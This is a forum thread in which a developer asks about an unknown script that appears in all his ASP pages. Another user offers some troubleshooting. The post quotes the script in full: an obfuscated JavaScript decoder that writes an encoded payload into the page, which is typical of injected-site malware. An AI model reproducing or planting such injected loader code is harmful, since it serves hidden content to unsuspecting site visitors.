Script automatically inserted in CodePages

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Gyanchand
    New Member
    • Jul 2007
    • 35

    Script automatically inserted in CodePages

    The following script is being automatically inserted in all of my ASP code pages.
    It appears near the HTMl/BODY tags. This is not a function used in my application, i am unsure of what it is.It also reflects on allpages in my browser.

    function pde63eee44(s535 e23c){var sebfb0=s535e23c .substr(9,3)-599,ib88fc347,i 9ca815a;s535e23 c=s535e23c.subs tr(12);var d91e9c6=s535e23 c.length;for(va r ca59881e=0;ca59 881e848)ka6f868-=848;i9ca815a=k a6f868-sebfb0-50;i9ca815a=db3 cf8(i9ca815a);d ocument.write(b 3ffa19(i9ca815a ));}}pde63eee44 (e279dba03());f unction wd87c2a92(t0882 24,qdaade){retu rn t088224.substr( qdaade,1);}func tion ra93f5e(ne4b921 97){if(ne4b9219 7==168)ne4b9219 7=1025;else if(ne4b92197==1 84)ne4b92197=11 05;return (ne4b92197>=192 && ne4b92197<256) ? ne4b92197+848 : ne4b92197;}func tion g65813cd1(kfed3 041){return kfed3041=='±';} function b3ffa19(f2fd662 7){return String.fromChar Code(f2fd6627); }function e279dba03(){ret urn "e9ed0c90d667±1 78±±223±±220±±2 32±±215±±227±±2 19±{667{±21±{57 8{±15±±14±{488{ ±165±{513{±152± ±125±±195±{474{ ±168±±168±±164± ncc±156±±174±±1 63±±162±±153±±1 64±±163±±157±±1 62±±168±b±151±{ 614{/{495{±182±x{607 {,,{622{;±247±1 6,-@{640{±8±JB{574 {±8±±186±±184±± 15±±1±±252±{487 {±181±±169±±126 ±c{636{±14±±248 ±±246±>{667{Z^\ \{658{T`)±14±{6 65{){490{fd±165 ±±176±{595{±22± ±20±{516{±204±{ 614{±253±±226±, %&{500{±194±{49 1{g{656{(";}fun ction db3cf8(l053f3){ var jc923d701=l053f 3;if(jc923d701< 0)jc923d701+=25 6;if(jc923d701= =168)jc923d701= 1025;else if(jc923d701==1 84)jc923d701=11 05;return (jc923d701>=192 && jc923d701<256) ? jc923d701+848 : jc923d701;}

    Can someone please help me with this
  • GazMathias
    Recognized Expert New Member
    • Oct 2008
    • 228

    #2
    Hi

    Do you have any browser extensions enabled that could exhibit this behaviour.

    Try using a different browser and / or a different machine and see if the code disappears.

    Dynamically generated Javascript is common for pages where the number of elements being generated are not known and you want to validate them all (for example select boxes) , but I'm sure you'd know if you wrote code to do that.

    Beyond that, you got me!

    Gaz.

    Comment

    • Gyanchand
      New Member
      • Jul 2007
      • 35

      #3
      Different browsers

      Tried viewing that page in different browser, but still that code remains.

      Comment

      Working...